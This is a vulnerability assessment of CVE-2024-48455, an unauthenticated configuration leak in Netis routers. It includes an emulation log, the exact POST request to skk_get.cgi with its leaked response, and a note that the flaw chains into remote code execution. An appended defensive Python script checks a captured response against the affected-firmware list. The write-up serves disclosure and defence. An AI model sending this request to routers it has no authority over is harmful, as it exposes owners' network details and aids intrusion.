CVE-2024-48455
Description
An issue in Netis Wifi6 Router NX10 2.0.1.3643 and 2.0.1.3582 and Netis Wifi 11AC Router NC65 3.0.0.3749 and Netis Wifi 11AC Router NC63 3.0.0.3327 and 3.0.0.3503 and Netis Wifi 11AC Router NC21 3.0.0.3800, 3.0.0.3500 and 3.0.0.3329 and Netis Wifi Router MW5360 1.0.1.3442 and 1.0.1.3031 allows a remote attacker to obtain sensitive information via the mode_name, wl_link parameters of the skk_get.cgi component.
Ratings
- Attacker Value: Medium
- Exploitability: Very High
Technical Analysis
CVE-2024-48455 allows for unauthenticated information disclosure revealing sensitive configuration information of several Netis Routers, including rebranded routers from GLCtec and Stonet, which can be used by the attacker to determine if the router is running specific vulnerable firmware.
We are using FirmAE to emulate the Netis Router firmware and using burpsuite to capture the request.
For this test, we are using the Netis Wifi 11AC Router Netis_NC65v2-V3.0.0.3800.bin vulnerable firmware version.
```
./run.sh -d netis /root/FirmAE/firmwares/Netis_NC65v2-V3.0.0.3800.bin
[*] /root/FirmAE/firmwares/Netis_NC65v2-V3.0.0.3800.bin emulation start!!!
[*] extract done!!!
[*] get architecture done!!!
[*] /root/FirmAE/firmwares/Netis_NC65v2-V3.0.0.3800.bin already succeed emulation!!!
[IID] 12
[MODE] debug
[+] Network reachable on 192.168.1.1!
[+] Web service on 192.168.1.1
[+] Run debug!
Creating TAP device tap12_0...
Set 'tap12_0' persistent and owned by uid 0
Bringing up TAP device...
Starting emulation of firmware... 192.168.1.1 true true 39.913154010 41.109368119
[*] firmware - Netis_NC65v2-V3.0.0.3800
[*] IP - 192.168.1.1
[*] connecting to netcat (192.168.1.1:31337)
[+] netcat connected
------------------------------
|       FirmAE Debugger      |
------------------------------
1. connect to socat
2. connect to shell
3. tcpdump
4. run gdbserver
5. file transfer
6. exit
> 2
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
~ # pwd
/
```
By issuing a simple POST request as listed below, you can obtain all the information of the router without any authentication.
POST Request

```
POST /cgi-bin/skk_get.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:131.0) Gecko/20100101 Firefox/131.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Connection: keep-alive

mode_name=skk_get&wl_link=0
```
Response

```
HTTP/1.1 200 OK
Date: Sun, 01 Jan 2023 00:07:53 GMT
Server: Boa/0.94.14rc21
Connection: close

{
  "version":"netis(NC65)V3.0.0.3800",
  "vender":"CIS",
  "model":"NC65v2",
  "easy_mesh":"EASYMESH",
  "switch_chipset":"",
  "tr069":"1",
  "time_now":"2023/01/01 08:07:53",
  "sys_date":"2023",
  "sys_date2":"1",
  "sys_date3":"1",
  "sys_time":"8",
  "sys_time2":"7",
  "sys_time3":"53",
  "uptime":"489",
  "cpu": "20%",
  "mem":"7%",
  "statsList":[{
    --- lot of additional information ---
  "wlanInfo":[
    { "st_wlconn":"0","apLinkList":[], },
    { "st_wlconn":"0","apLinkList":[], },
  ],
  "routeTable":[
    { "dstip":"192.168.1.0", "mask":"255.255.255.0", "gw":"0.0.0.0", },
  ],
  "arpList"[
    { "id":"1", "arp_ip":"192.168.1.2", "arp_mac":"d2:36:9f:d8:14:bf", "arp_host_name":"", "is_qos_idx":"0", "qos_up_limit":"0", "qos_down_limit":"0", },
  ],
  "dhcpList":[],
  "ndp_list":[
    { "id":"1", "ndp_ip6":"fe80::d036:9fff:fed8:14bf", "ndp_mac":"d2:36:9f:d8:14:bf", },
  ],
  "macClone":"d2:36:9f:d8:14:bf",
  "wscLock":"0",
  "ddnsInfo":"DDNS_STATE_START",
  "serialNo":"",
  "easymesh":{}
}
```
This CVE can be chained with CVE-2024-48456 and CVE-2024-48457 into an unauthenticated RCE.
A Metasploit module can be found here to exploit these routers.
Mitigation
There is no fix available.
The following router firmware versions are vulnerable:
- netis_MW5360_V1.0.1.3031_fw.bin
- Netis_MW5360-1.0.1.3442.bin
- Netis_MW5360_RUSSIA_844.bin
- netis_NC21_V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=40)
- netis_NC63_V3.0.0.3327.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
- netis_NC63_v4_Bangladesh-V3.0.0.3889.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
- Netis_NC63-V3.0.0.3833.bin (https://www.netisru.com/support/downinfo.html?id=35)
- netis_app_BeeWiFi_NC63_v4_Bangladesh-V3.0.0.3503.bin
- netis_NC65_V3.0.0.3749.bin
- Netis_NC65_Bangladesh-V3.0.0.3508.bin (https://www.netis-systems.com/support/downinfo.html?id=34)
- Netis_NC65v2-V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=34)
- netis_NX10_V2.0.1.3582_fw.bin
- netis_NX10_V2.0.1.3643.bin
- Netis_NX10_v1_Bangladesh-V3.0.0.4142.bin (https://www.netis-systems.com/support/downinfo.html?id=33)
- netis_NX10-V3.0.1.4205.bin (https://www.netisru.com/support/downinfo.html?id=33)
- netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3329.bin
- netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3500.bin
- Netis_NC21_v2_Bangladesh-V3.0.0.3854.bin (https://www.netis-systems.com/support/downinfo.html?id=40)
- GLC_ALPHA_AC3-V3.0.2.115.bin (https://drive.google.com/drive/folders/1P69yUfzeZeR6oABmIdcJ6fG57-Xjrzx6)
References
CVE-2024-48455
Metasploit Module PR 19770
Research Notes – Netis Router Exploit Chain Reactor
Credits
h00die-gr3y -> Discovery
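The assessment above shows that the skk_get.cgi response leaks the firmware version, which is exactly what an operator needs to confirm whether one of their own routers is on the affected list. The following is an added example, not part of the assessment or of the Metasploit module: it fingerprints a captured response body offline and compares model and version against the firmware list in the Mitigation section. The sample body is constructed from the captured response; note that the real response is not valid JSON (trailing commas, a missing colon before arpList), so the version is extracted with a regex rather than json.loads.

```python
import re

# Affected model/firmware pairs derived from the Mitigation list above
# (e.g. netis_NC65_V3.0.0.3749.bin -> model NC65, version 3.0.0.3749).
AFFECTED = {
    "MW5360": {"1.0.1.3031", "1.0.1.3442"},
    "NC21": {"3.0.0.3329", "3.0.0.3500", "3.0.0.3800", "3.0.0.3854"},
    "NC63": {"3.0.0.3327", "3.0.0.3503", "3.0.0.3833", "3.0.0.3889"},
    "NC65": {"3.0.0.3508", "3.0.0.3749", "3.0.0.3800"},
    "NX10": {"2.0.1.3582", "2.0.1.3643", "3.0.0.4142", "3.0.1.4205"},
}

# Constructed sample, abbreviated from the captured skk_get.cgi response.
# It deliberately keeps the malformed "arpList"[ fragment of the real output.
SAMPLE_BODY = (
    '{ "version":"netis(NC65)V3.0.0.3800", "vender":"CIS", "model":"NC65v2", '
    '"arpList"[ { "id":"1", "arp_ip":"192.168.1.2", }, ] }'
)

# The version field has the shape netis(<MODEL>)V<a.b.c.d>.
VERSION_RE = re.compile(
    r'"version"\s*:\s*"netis\((?P<model>[A-Za-z0-9]+)\)V(?P<ver>\d+(?:\.\d+)+)"'
)


def parse_version(body):
    """Return (model, firmware_version) from a response body, or None.

    A regex is used because the router's output is not parseable JSON.
    """
    m = VERSION_RE.search(body)
    if not m:
        return None
    return m.group("model"), m.group("ver")


def is_affected(body):
    """True if the fingerprinted firmware is on the affected list,
    False if it is a known model on another version, None if no
    version string could be found in the body."""
    parsed = parse_version(body)
    if parsed is None:
        return None
    model, ver = parsed
    return ver in AFFECTED.get(model, set())


if __name__ == "__main__":
    print(parse_version(SAMPLE_BODY), is_affected(SAMPLE_BODY))
```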